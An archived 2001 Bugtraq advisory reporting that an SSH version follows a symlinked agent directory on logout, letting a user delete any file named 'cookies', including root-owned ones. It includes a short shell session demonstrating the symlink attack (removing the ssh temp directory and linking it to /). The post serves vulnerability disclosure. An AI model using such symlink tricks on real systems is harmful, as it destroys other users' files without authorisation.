[20842] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

SSH allows deletion of other users files...

daemon@ATHENA.MIT.EDU (zen-parse@gmx.net)
Mon Jun 4 11:19:06 2001

Date: Mon, 4 Jun 2001 22:14:29 +1200 (NZST)
From: <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0106042203210.13293-100000@clarity.local>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

SSH allows deletion of other users files.
=========================================

You can delete any file on the filesystem you want...

as long as its called cookies.

Not really a very useful bug, but could cause annoyances to
people who actually like their cookies.

 /home/zen/.netscape/cookies

sample exploit:-

 [root@clarity /root]# touch /cookies;ls /cookies
 /cookies
 [root@clarity /root]# ssh zen@localhost
 zen@localhost's password:
 Last login: Mon Jun  4 20:22:39 2001 from localhost.local
 Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
 [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
 [zen@clarity zen]$ logout
 Connection to localhost closed.
 [root@clarity /root]# ls /cookies
 /bin/ls: /cookies: No such file or directory

--zen-parse


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[20842] in bugtraq

SSH allows deletion of other users files...

daemon@ATHENA.MIT.EDU (zen-parse@gmx.net)Mon Jun 4 11:19:06 2001

daemon@ATHENA.MIT.EDU (zen-parse@gmx.net)
Mon Jun 4 11:19:06 2001